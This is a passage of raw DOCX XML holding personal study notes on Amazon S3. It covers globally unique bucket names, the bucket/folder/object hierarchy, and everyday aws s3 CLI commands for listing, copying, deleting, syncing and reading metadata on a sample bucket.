        <w:t xml:space="preserve">└── backups/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">└── db-backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B66">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B67">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://my-awesome-bucket.s3.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B68">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B69">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hierarchical Structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bucket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Buckets </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MUST have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLOBALLY unique</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> names. So if I name my bucket michael-random, then NO OTHER user in the world can have a bucket named michael-rangom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Folders can be in the same level as Objects, just like in the example above with vacation/ and dog.jpg. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B72">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate s3 buckets in Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Display all buckets in your AWS account:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1486"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Contents of a Bucket (top-level):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Display all objects in the bucket, including subfolders (recursively)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/ --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download a File (to local machine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="848"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 cp s3://my-awesome-bucket/images/cat.jpg ./cat.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="848"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download cat.jpg from the images folder to your local machine, and store that file as ./cat.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 cp newfile.txt s3://my-awesome-bucket/documents/newfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload newfile.txt to the documents folder:</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="839"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 rm s3://my-awesome-bucket/documents/notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete an Entire Folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 rm s3://my-awesome-bucket/backups/ --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sync folders:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 sync ./local-folder s3://my-awesome-bucket/documents/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uploads all files in local-folder to the documents folder in S3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View Object Metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1408"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api head-object --bucket my-awesome-bucket --key images/cat.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1408"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get metadata for a specific object:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B95">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Interact with Pseudo-Directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B97">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Files in a "Directory"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B99">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To list all files under images/vacation/:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/images/vacation/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List All Objects Starting with a Prefix</w:t>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t xml:space="preserve">To list all files under images/ (including subfolders):</w:t>
      </w:r>
